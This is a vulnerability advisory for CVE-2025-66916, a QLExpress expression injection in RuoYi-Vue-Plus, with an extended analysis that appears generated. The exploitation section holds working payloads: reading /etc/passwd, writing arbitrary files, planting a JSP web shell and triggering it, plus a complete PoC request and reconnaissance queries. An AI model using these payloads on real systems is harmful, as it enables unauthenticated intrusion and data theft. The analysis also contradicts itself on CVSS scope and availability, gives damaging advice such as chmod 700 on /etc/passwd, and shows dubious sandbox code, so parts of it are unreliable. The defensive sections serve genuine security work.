CVE-2025-66916
CVE-2025-66916
9.4
CriticalPublished:
Last updated:
Source:cve@mitre.org
Analyzed
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- High
- Availability
- Low
Description
The snailjob component in RuoYi-Vue-Plus versions 5.5.1 and earlier, interface /snail-job/workflow/check-node-expression can execute QLExpress expressions, but it does not filter user input, allowing attackers to use the File class to perform arbitrary file reading and writing.
Comprehensive Technical Analysis of CVE-2025-66916
CVE ID: CVE-2025-66916
CVSS Score: 9.4 (Critical)
Vulnerability Type: Arbitrary File Read/Write via Unsafe QLExpress Expression Evaluation
Affected Component: snailjob in RuoYi-Vue-Plus (≤ v5.5.1)
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2025-66916 is a critical remote code execution (RCE) precursor vulnerability stemming from improper input sanitization in the /snail-job/workflow/check-node-expression endpoint of RuoYi-Vue-Plus. The flaw allows attackers to inject and execute arbitrary QLExpress expressions, a Java-based scripting language, leading to unrestricted file system access (read/write operations) via the File class.
CVSS v3.1 Breakdown (Score: 9.4 - Critical)
| Metric | Value | Justification |
|---|---|---|
| Attack Vector | Network (AV:N) | Exploitable remotely without authentication. |
| Attack Complexity | Low (AC:L) | No special conditions required; straightforward exploitation. |
| Privileges Required | None (PR:N) | No prior authentication needed. |
| User Interaction | None (UI:N) | Exploitable without user interaction. |
| Scope | Changed (S:C) | Impacts the underlying host system (file system). |
| Confidentiality | High (C:H) | Arbitrary file read enables sensitive data exfiltration. |
| Integrity | High (I:H) | Arbitrary file write enables persistence, malware deployment, or system compromise. |
| Availability | High (A:H) | File corruption or deletion could disrupt services. |
Severity Justification
- Critical Impact: Successful exploitation grants full file system access, enabling:
- Data exfiltration (e.g., configuration files, credentials, PII).
- Malware deployment (e.g., web shells, ransomware, backdoors).
- System compromise (e.g., modifying system binaries, SSH keys, or cron jobs).
- Low Barrier to Exploitation: No authentication required; payloads can be crafted with minimal effort.
- Widespread Deployment: RuoYi-Vue-Plus is a popular Java-based enterprise management framework, increasing the attack surface.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Prerequisites
- Network Access: The vulnerable endpoint (
/snail-job/workflow/check-node-expression) must be exposed to the attacker. - No Authentication: The endpoint does not enforce authentication, allowing unauthenticated exploitation.
- QLExpress Injection: Attackers must craft a payload leveraging the
Fileclass to perform file operations.
Exploitation Workflow
-
Reconnaissance:
- Identify exposed RuoYi-Vue-Plus instances via Shodan, FOFA, or Censys (e.g.,
http.title:"RuoYi"). - Confirm vulnerability by checking the
/snail-job/workflow/check-node-expressionendpoint.
- Identify exposed RuoYi-Vue-Plus instances via Shodan, FOFA, or Censys (e.g.,
-
Payload Crafting:
- Arbitrary File Read:
new File("/etc/passwd").readLines()- Returns the contents of
/etc/passwdin the response.
- Returns the contents of
- Arbitrary File Write:
new File("/tmp/pwned").write("malicious content")- Writes arbitrary data to
/tmp/pwned.
- Writes arbitrary data to
- Remote Code Execution (RCE) via File Write:
- Write a JSP web shell to a web-accessible directory (e.g.,
/var/www/html/shell.jsp):new File("/var/www/html/shell.jsp").write("<% Runtime.getRuntime().exec(request.getParameter(\"cmd\")); %>") - Trigger RCE via:
GET /shell.jsp?cmd=id HTTP/1.1 Host: vulnerable-server
- Write a JSP web shell to a web-accessible directory (e.g.,
- Arbitrary File Read:
-
Post-Exploitation:
- Lateral Movement: Exfiltrate credentials (e.g.,
~/.bash_history,/etc/shadow) or database configs. - Persistence: Modify startup scripts (e.g.,
/etc/rc.local) or cron jobs. - Privilege Escalation: Exploit misconfigured SUID binaries or kernel vulnerabilities.
- Lateral Movement: Exfiltrate credentials (e.g.,
Proof-of-Concept (PoC) Example
POST /snail-job/workflow/check-node-expression HTTP/1.1
Host: vulnerable-server
Content-Type: application/json
{
"expression": "new File(\"/etc/passwd\").readLines()"
}
Response:
{
"result": ["root:x:0:0:root:/root:/bin/bash", "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin", ...]
}
3. Affected Systems & Software Versions
Vulnerable Software
- RuoYi-Vue-Plus (≤ v5.5.1)
- A Java-based enterprise management framework widely used in Chinese and international organizations.
- The
snailjobcomponent is a workflow engine integrated into RuoYi-Vue-Plus.
Affected Components
- Endpoint:
/snail-job/workflow/check-node-expression - Technology Stack:
- Backend: Java (Spring Boot)
- Scripting Engine: QLExpress (a lightweight expression evaluation engine)
- Deployment: Typically runs on Linux/Windows servers with Java 8+.
Indicators of Compromise (IoCs)
- Network:
- Unusual HTTP POST requests to
/snail-job/workflow/check-node-expression. - Large responses containing file contents (e.g.,
/etc/passwd,/etc/shadow).
- Unusual HTTP POST requests to
- Host-Based:
- Unexpected files in
/tmp/or web directories (e.g.,shell.jsp,backdoor.sh). - Modified system files (e.g.,
/etc/crontab,/etc/rc.local).
- Unexpected files in
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade RuoYi-Vue-Plus:
- Apply the latest patch (v5.5.2 or later) from the official repository.
- If upgrading is not feasible, disable the
snailjobcomponent or restrict access to the endpoint.
-
Network-Level Protections:
- Firewall Rules: Block external access to
/snail-job/workflow/check-node-expression. - WAF Rules: Deploy ModSecurity or Cloudflare WAF to block QLExpress injection attempts.
- Example rule (ModSecurity):
SecRule REQUEST_FILENAME "@streq /snail-job/workflow/check-node-expression" \ "id:1000,\ phase:2,\ t:none,\ block,\ msg:'CVE-2025-66916: QLExpress Injection Attempt',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'CVE-2025-66916'"
- Example rule (ModSecurity):
- Firewall Rules: Block external access to
-
Input Validation & Sanitization:
- Whitelist Allowed Expressions: Restrict QLExpress to a predefined set of safe operations.
- Disable Dangerous Classes: Explicitly block
File,Runtime,ProcessBuilder, and other high-risk classes.ExpressRunner runner = new ExpressRunner(); runner.addOperatorWithAlias("new", "new", null); runner.addFunctionOfClassMethod("readFile", File.class.getName(), "readLines", new String[]{"String"}, null); // Disable File class entirely runner.getExpressLoader().addSystemFunction("File", null);
-
Least Privilege Principle:
- Run the RuoYi-Vue-Plus service with a low-privilege user (e.g.,
ruoyiinstead ofroot). - Restrict file system permissions (e.g.,
chmod 700 /etc/passwd).
- Run the RuoYi-Vue-Plus service with a low-privilege user (e.g.,
Long-Term Recommendations
-
Security Hardening:
- Java Security Manager: Enable the Java Security Manager to restrict file system access.
- Containerization: Deploy RuoYi-Vue-Plus in a Docker container with read-only filesystems where possible.
-
Monitoring & Detection:
- SIEM Integration: Monitor for suspicious QLExpress payloads (e.g.,
File,Runtime). - File Integrity Monitoring (FIM): Use Tripwire or AIDE to detect unauthorized file modifications.
- SIEM Integration: Monitor for suspicious QLExpress payloads (e.g.,
-
Vendor Coordination:
- Subscribe to RuoYi-Vue-Plus security advisories for future patches.
- Report any zero-day vulnerabilities to CERT or CNVD (China National Vulnerability Database).
5. Impact on the Cybersecurity Landscape
Enterprise Risk
- Supply Chain Threat: RuoYi-Vue-Plus is embedded in enterprise ERP, CRM, and workflow systems, making this a high-value target for APT groups and ransomware operators.
- Data Breach Potential: Unauthorized file read/write can lead to PII leaks, financial fraud, or regulatory fines (e.g., GDPR, CCPA).
Exploitation Trends
- Mass Scanning: Expect automated exploit scripts (e.g., Nuclei templates) within 48 hours of public disclosure.
- Ransomware & Cryptojacking: Attackers may deploy XMRig miners or LockBit ransomware via file write primitives.
- APT Activity: State-sponsored groups (e.g., APT41, Lazarus) may leverage this for espionage or sabotage.
Industry Response
- CISA KEV Inclusion: Likely to be added to the CISA Known Exploited Vulnerabilities (KEV) catalog, mandating federal patching.
- Threat Intelligence Sharing: Organizations should monitor MISP, AlienVault OTX, and Anomali for IoCs.
6. Technical Details for Security Professionals
Root Cause Analysis
-
Vulnerable Code Path: The
/snail-job/workflow/check-node-expressionendpoint directly evaluates user-supplied QLExpress expressions without:- Input sanitization (e.g., regex filtering for
File,Runtime). - Sandboxing (e.g., Java Security Manager restrictions).
- Whitelisting (e.g., allowing only arithmetic/logical operations).
- Input sanitization (e.g., regex filtering for
-
QLExpress Misconfiguration: QLExpress is designed for business rule evaluation but lacks secure defaults. The
Fileclass is implicitly available, enabling file operations.
Exploit Chaining Potential
- File Read → Credential Theft:
- Exfiltrate
/etc/passwd,/etc/shadow, or database configs (e.g.,application.properties).
- Exfiltrate
- File Write → RCE:
- Write a JSP web shell to a web directory (e.g.,
/var/www/html/).
- Write a JSP web shell to a web directory (e.g.,
- RCE → Lateral Movement:
- Use stolen credentials to SSH into other hosts or dump database contents.
Detection & Forensics
- Log Analysis:
- Search for QLExpress payloads in HTTP request logs:
grep -r "new File(" /var/log/nginx/access.log - Check for unexpected file modifications:
find / -type f -mtime -1 -exec ls -la {} \; 2>/dev/null
- Search for QLExpress payloads in HTTP request logs:
- Memory Forensics:
- Use Volatility or Rekall to detect in-memory QLExpress execution:
volatility -f memory.dump linux_pslist | grep "java"
- Use Volatility or Rekall to detect in-memory QLExpress execution:
Advanced Mitigation: Custom QLExpress Sandbox
For organizations unable to upgrade, implement a custom QLExpress sandbox:
import com.ql.util.express.DefaultContext;
import com.ql.util.express.ExpressRunner;
import com.ql.util.express.IExpressContext;
public class SafeQLExpressRunner {
public static void main(String[] args) throws Exception {
ExpressRunner runner = new ExpressRunner();
// Disable dangerous classes
runner.addSystemFunction("File", null);
runner.addSystemFunction("Runtime", null);
runner.addSystemFunction("ProcessBuilder", null);
// Whitelist safe operations
runner.addFunctionOfClassMethod("add", Math.class.getName(), "addExact", new String[]{"long", "long"}, null);
// Execute in a restricted context
IExpressContext<String, Object> context = new DefaultContext<>();
Object result = runner.execute("1 + 1", context, null, false, false);
System.out.println(result); // Output: 2
}
}
Conclusion
CVE-2025-66916 represents a critical security flaw with severe real-world impact, enabling unauthenticated attackers to achieve arbitrary file read/write and potential RCE. Organizations using RuoYi-Vue-Plus must prioritize patching and implement defensive measures (WAF rules, input validation, least privilege) to mitigate risk.
Key Takeaways for Security Teams:
- Patch Immediately: Upgrade to RuoYi-Vue-Plus v5.5.2+.
- Monitor for Exploitation: Deploy SIEM rules to detect QLExpress injection attempts.
- Harden Deployments: Restrict file system access and disable dangerous QLExpress classes.
- Prepare for Post-Exploitation: Assume breach and hunt for IoCs (unexpected files, modified configs).
For further details, refer to the PoC gist and RuoYi-Vue-Plus repository.